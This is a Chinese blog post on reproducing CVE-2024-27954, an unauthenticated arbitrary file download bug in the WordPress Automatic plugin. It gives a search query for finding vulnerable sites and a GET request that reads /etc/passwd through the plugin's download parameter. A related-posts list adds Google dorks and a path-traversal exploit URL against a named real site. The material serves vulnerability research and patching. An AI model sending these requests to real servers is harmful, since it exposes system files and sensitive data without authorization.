【漏洞复现】WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)

最新推荐文章于 2024-06-20 16:58:55 发布
最新推荐文章于 2024-06-20 16:58:55 发布
阅读量485 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/137082598
版权
本文介绍了WordPress Automatic Plugin的安全漏洞,该漏洞允许未授权攻击者下载服务器任意文件。详细讨论了漏洞概述,影响范围,并提供了漏洞复现步骤。
摘要由CSDN通过智能技术生成

0x01 产品简介

WordPress Automatic Plugin是一款功能强大的WordPress插件,旨在帮助用户自动采集并发布内容。这款插件支持从各种来源自动采集内容,包括但不限于RSS源、网站、YouTube、eBay等。用户可以根据自己的需求设置采集规则,选择要采集的内容类型、关键词、发布时间等。一旦设置完成,插件会自动按照规则定时采集内容,并发布到WordPress网站上。

0x02 漏洞概述

WordPress Automatic Plugin 小于 3.92.1 的版本存在任意文件下载漏洞,未授权的攻击者可以通过该漏洞下载服务器的任意文件,从而获取大量敏感信息。

0x03 测绘语句

publicwww: "/wp-content/plugins/wp-automatic"

0x04 漏洞复现

代漏洞复现:GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
专栏目录
订阅专栏
WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)(含批量验证poc)
weixin_43567873的博客
03-30 150
WordPress Automatic Plugin 任意文件下载漏洞(CVE-2024-27954)
WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)
0xSec
05-01 1225
WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞,该漏洞源于插件的用户身份验证机制,威胁者可以绕过该机制执行恶意SQL查询,将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件,并可能完全控制受影响的网站。
WordPress 文件下载漏洞
深蓝旭的博客
08-23 843
Google dork:inurl:"/wp-content/themes/liberator/inc/php/download.php" exploit:https://www.televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php google dork: inurl:"/wp-content/themes/newspro2891/download.ph...
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1132
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
漏洞复现WordPress Automati插件-SQL注入-ccsv.php(CVE-2024-27956)
最新发布
知黑而守白
06-20 83
wordpress是一种自由和开放源代码的内容管理系统,基于php和mysql,使用wordpress,用户可以很容易地创建和维护个人或商业网站、博客、电子商务网站或应用程序,而无需深入了解编程语言或数据库管理。WordPress Automati插件 ccsv.php接口处存在 SQL注入漏洞**,**恶意攻击者可能会利用该漏洞执行恶意SQL语句,查看用户名密码等,造成信息泄露,最终可能会导致服务器失陷。影响版本。
WordPress Automatic SQL注入漏洞
weixin_43167326的博客
05-02 993
WordPress Plugin WP Automatic 存在SQL注入漏洞(CVE-2024-27956),该漏洞允许未经身份验证的远程攻击者执行任意SQL代码,获取数据库的敏感信息,或者对数据库进行增、删、改、查等危险操作。
漏洞复现WordPress Automatic SQL注入漏洞(CVE-2024-27956)
qq_67810151的博客
05-07 484
WordPress Automatic Plugin 小于 3.92.0 的版本存在SQL注入漏洞,未授权的攻击者可以通过该漏洞获取数据库敏感信息。
WordPress Plugin NotificationX插件 SQL注入漏洞复现CVE-2024-1698)
0xSec
03-20 787
WordPress plugin NotificationX是一个应用插件。2.8.2版本及之前存在安全漏洞,该漏洞源于对用户提供的参数转义不充分以及对现有 SQL 查询缺乏充分的准备,很容易通过“type”参数受到 SQL 注入攻击。
wordpress 漏洞_WordPress漏洞分析
weixin_42514783的博客
01-26 5439
根据CVE官方漏洞通报得知wordpress新出一个组合式rce漏洞漏洞编号分别为CVE-2019-8943和CVE-2019-8942,下载漏洞版本源码,分析漏洞触发过程,注:漏洞复现时一定要断网搭建,wordpress在联网状态时会自动更新代码包。找到漏洞发生文件 post.php,wordpress有多个post.php文件,这里简要说明一下各自的作用,wp-includes/post.p...
WordPress wp-trackback.php漏洞分析
03-03
本文对WordPress wp-trackback.php漏洞作了分析。
CVE-2024-27954 WordPress Automatic插件 SSRF与任意文件读取漏洞分析
shelter1234567的博客
05-27 830
WordPress Automatic 插件
WordPress plugin 代码注入漏洞(CVE-2022-24663)
千寻的博客
12-09 2471
远程代码执行漏洞,任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 `PHP Everywhere `的请求,并在站点上执行任意 PHP 代码。 存在常见用户名低权限用户弱口令
WordPress Plugin SQL注入漏洞(CVE-2024-25832)
2301_80127209的博客
06-18 593
WordPress是一种流行的内容管理系统(CMS),它提供了基本的网站功能,如文章发布、页面管理和用户权限控制等。然而,有时候用户需要更多的功能或特定的定制需求,这时就可以使用WordPress Plugin来实现。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
插件漏洞导致 60 万个 WordPress 网站遭受攻击
网络研究观
11-16 4838
建议所有使用该插件的用户尽快升级到最新版本。
悬镜安全WordPress插件漏洞影响超过100万个网站
Anprou的博客
03-03 1312
作为我们Sucuri防火墙(WAF)漏洞研究项目的一部分,为了查找存在的安全问题,我们已经审计了多个开源项目。 当审计WordPress的“NextGEN”相册插件时,我们发现了一个严重的SQL注入漏洞。 该漏洞允许一个未经授权的用户从受害人网站的数据库中偷取数据,包括用户的敏感信息。 目前,有超过100万个WordPress网站安装了这个易被攻击的插件。 你处在危
wordpress4.9漏洞
小小猪的博客
12-01 8235
漏洞介绍: WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标。这次实验的漏洞是在WordPress核心中的一个经过身份验证的任意文件删除漏洞CVE-2018-20714 该漏洞可能导致攻击者执行任意代码。该漏洞自发现到报告给W
wordpress 漏洞_WordPress漏洞。 如何保护我的WordPress博客?
culin0274的博客
08-10 535
wordpress 漏洞 WordPress, being one of the most popular blogging platforms used, powers 60 million websites worldwide. So quite naturally, it is a prime target for criminals to try and find exploits in...
CVE-2020-25213 —— WordPress wp-file-manager 文件上传漏洞
战神/calmness的博客
12-10 8511
CVE-2020-25213 | WordPress wp-file-manager 文件上传漏洞 WordPress 插件WP-file-manager介绍 WP-file-manager是一个帮助WordPress管理员管理其站点上文件的插件。该插件包含一个附加库elFinder,它是一个开放源代码文件管理器,用来创建简单的文件管理界面,并提供文件管理器背后的核心功能。WP-file-manager插件以引入漏洞的方式使用了该库。 描述 WordPress 6.9之前的文件管理器(wp-fi
CVE-2019-10247漏洞处理
03-29
CVE-2019-10247是一个在Jenkins中的安全漏洞,该漏洞存在于Pipeline: Groovy Plugin中,攻击者可以利用该漏洞执行未授权的Groovy脚本。 以下是处理CVE-2019-10247漏洞的步骤: 1. 首先,您需要确认您的Jenkins版本是否受到该漏洞的影响。该漏洞影响Jenkins Pipeline: Groovy Plugin的所有版本。您可以通过访问Jenkins漏洞数据库来查看所有受影响的版本。 2. 如果您的版本受到影响,则需要立即升级到最新版本。Jenkins已发布了一个修复程序,您可以通过访问Jenkins官方网站来下载最新版本。 3. 如果您无法立即升级,您可以使用插件管理器来禁用Pipeline: Groovy Plugin插件。这将防止攻击者利用该漏洞。 4. 另外,您还可以实施其他安全措施,例如限制Jenkins的访问权限、执行最小特权原则、使用双因素身份验证等。 总之,处理CVE-2019-10247漏洞需要立即采取措施,以防止攻击者利用该漏洞对您的系统进行攻击和入侵。升级到最新版本或禁用插件是最有效的措施之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值